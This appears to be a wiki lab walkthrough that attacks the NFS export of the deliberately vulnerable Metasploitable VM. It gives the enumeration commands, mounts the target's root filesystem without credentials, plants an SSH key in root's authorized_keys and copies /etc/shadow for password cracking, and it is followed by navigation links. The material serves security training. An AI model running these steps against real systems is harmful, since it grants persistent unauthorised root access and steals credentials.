Metasploitable/NFS
From charlesreid1
Network File System
The Metasploitable virtual machine has some network file system ports open, making it wide-open to attacks. (More info on network file systems generally at Linux/NFS)
The Metasploitable machine is at 10.0.0.27.
Start by checking out what network services are running - use the rpcinfo command to do that:
# rpcinfo -p 10.0.0.27
This will return information about open ports and RPC services. We can see that there is an NFS service listening on port 2049:
root@morpheus:~# rpcinfo -p 10.0.0.27
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 38085 status
100024 1 tcp 52004 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 60702 nlockmgr
100021 3 udp 60702 nlockmgr
100021 4 udp 60702 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 34385 nlockmgr
100021 3 tcp 34385 nlockmgr
100021 4 tcp 34385 nlockmgr
100005 1 udp 45599 mountd
100005 1 tcp 42810 mountd
100005 2 udp 45599 mountd
100005 2 tcp 42810 mountd
100005 3 udp 45599 mountd
100005 3 tcp 42810 mountd
Now use the showmount command to show what file systems are mountable on this NFS:
root@morpheus:~# showmount -e 10.0.0.27 Export list for 10.0.0.27: / *
Woot - the entire filesystem is mountable/writable!
To mount the network filesystem, we need to run the RPC service rpcbind.
# service rpcbind start
Now we can mount the filesystem at the IP address, with no credentials:
# mkdir /tmp/r00t # mount -t nfs 10.0.0.27:/ /tmp/r00t
Abusing
Now we can abuse our write access to the filesystem by copying an SSH key into the remote machine's trusted SSH keys, and obtain passwordless remote access:
# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
We can copy the shadow file to the local disk to crack with John the Ripper:
# cp /tmp/r00t/etc/shadow ~/victim_shadow_file
We could also use the Metasploit post modules, for information-gathering on Linux machines.
Dismount When Finished
Dismount when finished to make sure all those goodies you left behind actually end up being written to the disk:
# umount /tmp/r00t
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|
|
linux networking all the pages for linux networking
Diagnosing network interfaces: Linux/Network Interfaces Connecting to nodes with ssh: Linux/SSH Bridging networks with ssh tunnels: Linux/SSH Linux file server nfs/smb/sshfs: Linux/File Server Samba on linux: Linux/Samba Automounting network shares on linux: Linux/Automount Network Shares Monitoring system resources: Linux/System Monitoring Linux systemd: Linux/Systemd
IP Schema (ipcalc): Linux/IP Schema DHCP Server: Linux/DHCP DNS Server: Linux/DNS NTP Server: Linux/NTP
|